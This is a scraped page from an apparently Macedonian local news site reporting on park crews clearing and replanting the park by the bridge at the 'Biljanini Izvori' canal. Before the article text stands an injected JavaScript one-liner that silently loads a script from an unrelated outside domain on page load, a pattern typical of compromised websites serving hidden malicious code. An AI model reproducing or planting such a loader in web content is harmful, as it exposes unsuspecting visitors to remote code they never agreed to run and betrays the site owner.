;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Се средува паркот пред мостот кај „Билјанини Извори„ -

Се средува паркот пред мостот кај „Билјанини Извори„

Екипите на „Паркови и зеленило„ деновиве интензивно го уредуваат паркот лоциран пред мостот кај каналот „Билјанини Извори„. На локацијата од отстранетитe киосци ќе се засадува трева, а во најскоро време на целиот простор треба да се постави систем за наводнување. Уредени се крошните од дрвјата и отстранети суви гранки. Расчистена е и областа „Мазија„ која се наоѓа во близина на обновеното живеалиште на жолтиот локвањ.

Leave a Reply

Your email address will not be published.